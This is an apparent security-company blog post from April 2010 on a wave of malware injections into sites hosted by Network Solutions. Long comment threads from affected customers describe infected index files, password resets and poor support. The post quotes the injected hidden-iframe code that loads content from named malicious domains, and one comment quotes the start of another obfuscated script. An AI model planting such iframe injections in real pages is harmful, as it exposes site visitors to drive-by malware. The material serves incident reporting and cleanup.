Network Solutions hacked again

  • April 18, 2010

Network Solutions is getting hacked again. Just today we were notified of more than 50 sites hacked with the following malware javascript:

If we decode this javascript, we see that it is injecting this iframe from http://corpadsinc.com/grep/ :

document.write (s) < iframe frameborder="0" onload=' if (!this.src){ this.src="http://corpadsinc.com/grep/"; this.height=0; this.width=0;} '

Note that this time we are seeing all kind of sites hacked. From WordPress, Joomla to just simple HTML sites.

UPDATE 1: Google is already blacklisting lots of them… Bad day to be a Network Solutions customer.

UPDATE 2: Some sites are also compromised with this encoded javascript:

Which injects an iframe from that http://mainnetsoll.com/grep/ domain (same from the attack of last week)

iframe frameborder=”0″ onload=’ if (!this.src){ this.src=”http://mainnetsoll.com/grep/”; this.height=0; this.width=0;} ‘

UPDATE 3: Some WordPress sites we were analyzing only had the malware inserted at the cache file from WP-Super-Cache. Everything else was clean.

UPDATE 4: Post from http://stopmalvertising.com explaining their finds on this issue.

UPDATE 5: Network solutions updated their blog apologizing to their clients and saying that they are working hard to fix it. Hopefully it will be solved soon.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
69 comments

  2. I've been hacked. Happened around 2:40 PM on my NS Shared.

    They are hitting WordPress index.php files.

  3. They've inserted coded script in the following.

    index.php
    wp-content/index.php
    wp-content/themes/index.php
    wp-content/plugins/index.php
    wp-admin/index.php

    4/18/2010 at 2:54 PM

  7. My ftp password didn't get changed, but all my index.* files have had code inserted into them. Vanilla html, no WordPress, etc.

  8. Update — a file named default.html also was affected on my site. Anybody have any other file names affected?

  9. So what are the steps at least for now to get our site back to normal?

    And what do we need to do to prevent this and similar hacks in the future?
    Do we need to make our permissions tighter, and if we do what files specifically without interfering with our server's and wordpress' communications and updates?

  10. man… this has been going on for weeks. The solution? Ditch Network Solutions… their security sucks and they are always getting hacked.

    -pissed developer.

  11. My NS site was hacked twice.
    It doesn't help that NS doesn't seem to promptly offer updated WP installs on their hosting.
    I'm not particularly savvy on updating WP as well as many other are not either. It would help if at least WP didn't serve up old outdated versions of WP

  12. It is not a WordPress problem. NS security was compromised. They also restored malware from backups in some cases.

    A fresh install is always good but wont work if the main security is compromised.

    Upgrading WP is usually easy since 2.7 something. However that doesnot touch wp-content folder in theme or uploads which are likely malware locations.

  13. Indeed, NS is hiding behind a veil of distrust and not respecting their customer base that was affected, me included. I have issued at least 6 service requests in the past two weeks only to get boiler plate emails that the issue has been resolved, when my questions were never answered.

    Vanilla html was affected this time, and FTP passwords were compromised. NS can't blame WordPress this time around, shame on NS for not taking responsibility for their own security. Now thousands of sites have lost revenue due to their security issues. Web servers were compromised across several sectors of their farm, and some how I think it may be an internal issue.

    With respect to WP upgrades, I upgrade my installations manually since NS does not keep the lasted version immediately available.
    1. Download the lasted WP update from the WP update site and unzip.
    2. Back up your entire blog folder to a remote location, then delete the wp-includes folder and all contents, wp-admin folder and all contents, and delete all files in the root of the blog directory with the exception of wp-config.php file. If you have any other manually edited files such as an .htaccess file you will want to save that one also.
    3. Copy the new WP version folders wp-admin, wp-include and all new files to the root directory except the wp-config.php file.
    4. Log into your blog and then check that all your plug-ins are updated and update those also. Then re-activate all your plug-ins.

    Hope that helps!
    Regards,
    ET
    3.

  14. My vanilla html site has now had malicious code inserted 6 times in the last 24 hours. Their tech support has nothing helpful to say. I have now pulled my site down altogether as I can't otherwise prevent my (largely un-tech-savvy) visitors from the threat posed by this code.

  15. I was hit as well. I'm running Joomla, and the index.php file was altered with the JS. Also, index files were created in subfolders, "images" for example, where they did not exist previously. I changed all ftp pws and it stopped.

  16. Another vanilla html site was hit. I removed the malicious code and waiting for the following attack i suppose. Some weeks ago our ftp passwords were also compromised. It is not the first time NS was attacked. And apparently all kind of sites are attacked. I will advice my clients to change provider. It seems to be the only real solution.

  18. We use Network Solutions as our hosting and email provider but unlike the rest of you, our website was unaffected. Our problem is that our email stopped working last friday and I am wondering if this had anything to do with the hack. It took me 15 phone calls for them to explain that we had violated their TOS agreement for spamming. It's funny that we don't advertise via email but through direct mail. So WITHOUT ANY NOTIFICATION, they shut down our pop serivces and have crippled our business. They also have not provided any proof to these accusations which makes me incredibly irate. We have been using Network Solutions for around 60 days now, and in 15 years of using our last provider, we have never experienced any issues whatsoever. We needed to switch because we needed a Windows platform. I also find out that we can send mail but cannot recieve it. I would think that due a spamming violation, the opposite would happen. Cannot send but can recieve. What do you guys think about this? I think it should be passed on to legal.

  19. I am new to NS I've been developing my new project for 75 days I haven't even officially deployed my site yet it's in "In Production Mode" when you go to my URL. I was affected by the breach-hacks.

    I thought NS would be a real safe and secure choice with all the big name sites and blogs using them and assumed they had top notch security for customers.

    Guess I misjudged that decision.

  20. This is the form email I received when I notified Network Solutions on 4/11 that I thought something fishy was going on with one of my sites: Thank you for contacting Network Solutions Customer Service Department. We are committed to creating the best Customer experience possible. One of the first ways we can demonstrate our commitment to this goal is to quickly and efficiently handle your recent request. We apologize for any inconvenience this may have caused you. Based on your concern, proponents of malware commonly look for websites with vulnerabilities. These include weak passwords, third party applications that are not up to date or sometimes weakness could emanate from lack of updated anti-virus software on PCs. A large part of preventing these events comes from users taking preventive steps such as: ? Routinely change passwords including FTP/ blog/content management software ? Update your blog/content management software to the latest version. ? Update any plug-ins or 3rd party scripts or code you may have for your website ? Update firewalls & anti-virus on your local PCs. ? Make sure your file permissions are set correctly correct and do not allow unauthorized access. This is not an exhaustive list and these incidents can happen for a number of reasons. Just cleaning it once is not enough to resolve this. You should always take precautions.

  22. What irritates me the most is the shield of secrecy that NS operates under. Why don't they come out and own the fact that they've been hacked. I host more than 15 sites on NS and have been with them for over 10 years. But have always found their service below par. They try to blame YOU for all their own shortcoming (as I read above in the 'email-not-working' case and the security 'advisory' mail sent to another helpless complainant).

    Hey, Shashi Bellamkonda… are you reading this? We're all eagerly awaiting your response on all this… Mr. netsolcares!!!

    Shit happens… at least be honest about it!

    Shame on NS!

  26. web-search.com hacked again at 7:58am server time 4/22
    I took most stuff down for now.
    All cgi removed 2 weeks ago just in case.

    The worst part of all this is NS tried to tell me I had a problem with my content when I first told them about it 17 days ago.
    All the while knowing that many others had the same problem.
    I spend hours going through everything and kept getting hacked.
    If NS had been honest, I'd have saved countless hours trying to fix something I had no control over.
    Just a comment: Why is it when I do searches for hacks, there are references all over over the place to fileman.cgi which NS uses?

    Not a happy camper.
    Bob

  27. BTW Does anyone know how long it takes for pages that have been removed due to this hack, to be deleted from search results?

  29. Hey Everybody, I have a straight up HTML site that kept having the index.html altered. I tried putting a redirect meta in the page code to prevent it from loading the malicious script, but a meta redirect still loads up to the body and the code is being inserted after the meta tags. My solution is to setup a 301 redirect (see: http://www.isitebuild.com/301-redirect.htm ) in .htaccess. That way the server never sends index.html to the requestor and replaces it with whatever page you put in the redirect page section of .htaccess. Hope this helps anyone. I'm super pissed @ NetSol, but pre-paid for 1 year hosting and can't back out now…

  30. It also works for crawlers… so search engines won't see the malicious code and knock you down the ratings board 🙂

  31. Network Solutions should make all this "right" somehow. This has not been funny for any of us.
    Over 2 weeks of this —so far——-

  32. My html web site has been hit too. It seems to be a new exploit they are using. It's some sort of PDF vulnerability.

    I called tech support and they said it could be 24 to 48 hours. My response was "why the hell have you not unplugged the server???" They are spreading virus all over the place while they attempt to fix it. Unplug the dam servers until the problem is fixed!!!

  33. Jumped ship myself…hosted a fair few sites over the years with a fair few hosts…but NetSol have proved to be by far the worst. This has really been the final straw with these guys.

  34. My sites attacked again during the night (early am 4/23)
    But now I'm unable to use ftp on ANY of my servers (3)
    Before it was just one effected.

    This is far from over.
    Oh btw, form letter from NS saying they found no bad code on the example I sent them.
    Is anyone even checking?

    Bob

  36. I caught the issue on my client's site. Unfortunately since we take very sensitive information from their customers I couldn't just change the code and be happy, so unfortunately I have been up all night (caught the issue at midnight and after 6 hours getting it all fixed, transferring all files, database, and DNS records over to a dedicated server), and I finally get to go to bed!

  39. Finally got back into my NS file manager today after waiting since Tues for them to fix things.

    My index files are hacked with script again.

  40. I don't know what to do. I'm two months into a NS shared hosting one year package. In production (a start up), not even public yet. I take security seriously, do scans daily, firewall, backups nightly, don't store info in my SFTP program, log in manually each time when I use SFTP, etc., etc. It's full time work. I am getting killed by these hacks.

  41. Still happening at 1430 CST. Had a new type of script inserted in a bait index.html page. This script starts out as "var gID=new Date();var kK=false;var dKA;var cNM;if(cNM!='xYN' && cNM != ''){cNM=nul"

  42. Still happening as of 1430 CST. Hit a bait index.html file. New script being used I think, it starts out as "Xvar gID=new Date();var kK=false;var dKA;var cNM;if(cNM!='xYN' && cNM != ''){cNM=nulX" but without the X's

  43. Still happening at 1430 CST . . .

    It's out of control obviously. What are we supposed to do? This is insane I didn't pay for this or deserve this.

    Steve

  45. @Steve, what is your site name?

    I'm not public yet. I already scanned them today with the Sucuri scanner with production – maintenance mode disabled and they came up RED. I was hacked last Sunday, we restored the database Monday. I made backups of the restored sites. Everything looked clean. They are still clean locally. Finally was able to get back into NS file manager today. First think I noticed was a weird modify and I opened it up and it was hacked. Also on my SMF forum.

  47. Site seems ok now but interesting problem.
    I can log into file manager and manage account just fine but not using WS-FTP program on my computer. Passwords are fine as they are the same as file manager at NS.
    Any thoughts?
    Is NS blocking outside programs at this moment?

    Bob

  48. Has anyone had their site blacklisted by google?? i ran sucuri scanner and came up negative, changed password, and deleted old files in server. i then uploaded new clean files. what is the turn around time for google to de-blacklist you and get your site up again in search results?? this is killing us!!

  49. Using the Google tool it took me about 24 hours or less to get the black listing taken off. You do need to verify you own the site to get them to do anything. It's as simple as adding a google code to you index page.

    BTW This is funny as hell to me at least. This is the current message I get when logging into file manager right now.

    "This Connection is Untrusted

    You have asked Firefox to connect
    securely to http://www.networksolutions.com, but we can't confirm that your connection is secure.

    Normally, when you try to connect securely,
    sites will present trusted identification to prove that you are
    going to the right place. However, this site's identity can't be verified."

  50. Details of above:

    http://www.networksolutions.com uses an invalid security certificate.

    The certificate is not trusted because the issuer certificate has expired.
    The certificate will not be valid until 1/21/2009 7:00 PM.

    (Error code: sec_error_expired_issuer_certificate)

  51. Certificate is now fixed but still not able to get in using WS-FTP
    Have to use web based system at NS

    Bob

  52. Would someone from Sucuri contact them and find out if this is going to be fixed or is some new process now in place?
    I notice that to use file manager now there are now two layers to go through to get to files. Perhaps this is a solution they've decided to implement?

    Bob

  53. After searching through most of the night I found our problem at the bottom of counter.cgi in the cgi-bin directory. It was injecting the malware script into all php pages (not just wordpress) after the final HTML tag. Removed it and now we're coming up clean on the sucuri scanner.

    I'm not very happy with NS right now.

    Tobin

  54. I'm on shared hosting. I was hit last Sunday. And again yesterday. I'm wondering if poorly maintained blogs (or even abandoned) on this setup might be part of the problem. NS should check all shared hosting blogs with some kind of automated checking system and notify these owners that "we've noticed you haven't logged in to your account for 30 days.
    We have sent you important security notifications please check your in box." If these blogs are infected and launching these attacks, those of us who are on top of things pay the price.

    There should be some kind requirement that shared hosting blog owners have to maintain proper security with no exceptions. That's not to much to ask. If they can not they should get a free blog setup where they don't have to deal with maintenance.

  55. Anyone have any idea when the nearly constant resetting of passwords will end?
    Wouldn't be so bad but there is no notification it's going to happen. You only find out by logging in as admin when your ftp program fails

    Bob

  56. No clue Bob.

    I can't even set my proper file permissions and make them stick for my own installs either.

    Apparently the only winning move at this point is not to play.

  57. Aren't we all getting tired of these message:

    [10:17:37 AM] Bob Bradley: ALERT: An important message from Network Solutions Customer Service

    We are currently experiencing high call volumes and you may experience longer hold times. You may also experience delays in making modifications to your account or website or even making account level changes or updates. We are aware of these issues, and our Engineers are working diligently to resolve the matter.

  58. PS I tried using file manager to set permissions but like you, it isn't changing.
    WS-FTP works "some" of the time but you almost have to sit on it to get anywhere.
    Very unproductive to say the least.

    Don't even think about calling. lol

    Bob

  59. I am using WordPress Bob and they aren't being much help either.

    If your not part of the WordPress "Club" apparently we're on our own.

  60. Now I can't even upgrade and remove plugin's or change permissions via file manager.

  61. My html we site is still totally down. Also, there main web page at networksolutions.com was serving virus at 3:15pm pacific time on 4-26-10. It's fixed now. I wish they would fix my site so quickly.

  63. Our site has been hacked 3 times now in the last four weeks. I have changed every password at least three times (and some four). It happened again last night with a different php code than before. All FTP passwords were reset (I assume by Netsol) so they must know what is happening. No official word from anybody and I can't wait on hold until they answer.

  64. Pingback: Modified Websites Pushing Trojans On the Rise « Webroot Threat Blog
  65. Pingback: Warning this Site May Harm Your Computer - Now What?
  66. Pingback: WordPress Hacked with Corpadsinc.com at Network Solutions
  67. Pingback: Network Solutions hosting compromised thousands of accounts | NJN Network

  68. I have used network solutions for several year to manage my domains, the service had been good up to 3 weeks ago when it went bang!

    1. I get an email alert that a .es domain was due to be renewed.
    2. I renewed the domain.
    3. I get my payment returned 2 days later, no explaination!
    4. I contact support (this is so backward a support system it is unbelievable).
    5. They inform me 2 days later that the domain needs to be renewed 57 days before it expires.
    Note the domain was renewed by me when they informed me it needed to be renewed!
    6. I get another email alert to renew the domain * right away * or I would lose it.
    7. I renew the domain name * for the second time *
    8. I receive the confirmation from Pay pal for the payment * no details just the total charged *
    9. I report this and the fact the domain renewal is in a mess to network support.
    9. I get a call from support and after talking to them for 20 minutes they tell me there is a problem in the system, the domain has been activated again and they are very sorry for this.
    10. I get a call 15 minuted later from another support person telling me the problem is not sorted and I need to pay for the domain renewal, after I explain the whole thing again they tell me the domain needs to be renewed 57 days before it expires. I end being told they will contact me again.
    11. I send another message to support outlining this problem and that I need to get this sorted, the domain is not activated (1 week the domain is not available now).
    12. I get another call from support to tell me everything they told me before, I tell them the domain is not activated and they said it is and if it the site is not available the problem is with my hosting company. I know the problem is not with my hosting company because I run the server!
    I ask to speak to a manager.
    13. I eventually get a manager (!), first this he says is…. You have some questions on the legalites of….., I stop him and explain the situation, he starts the whole 57 day story…. again!
    14. I explain  the same points I sent in the email, the manager answers… oh I see, I see!!!! I explain the renewal emails they sent out and that I renewed when these arrived…. yes I see, I see that here!!!!
    15. The manager goes on to tell me the user agreement states …. 57 days……..
    16. I explain if the domain needs to be renewed 57 days before it expired then they should send the renewal emails out before that period and not a couple of weeks before the expire period….. the guy starts to seem to understand, tells me he will see what he can do and get back to me. I explain the site is now down a week because of this and I need it sorted out * now *, he said he will get back to me or I should call them back!!!!
    17. 2 days later I get an email from netword solutions telling me my second renewal for the domain has been refunded to my account, no explaination…..

    This is still all going on, I now have a web site that has been down for a week and will be until they get this sorted. If a .es domain needs to be renewed 57 days before it expired then they should send the renewal alert emails out before that period and not after it has passed. One of the main reasons I am with network solutions was because one of their selling points is they will alert you when a renewal is due! And guess what, I am still asked to renew the domain on my network solutions account, bad, bad, bad service.

    If anyone wants a professional domain management company then don’t look at network solutions because professional it is not and they certainly do not understand the importance of the service they are advertising to do.

  69. Pingback: New infections today at Network Solutions | Sucuri Blog

Comments are closed.

Related Categories
You May Also Like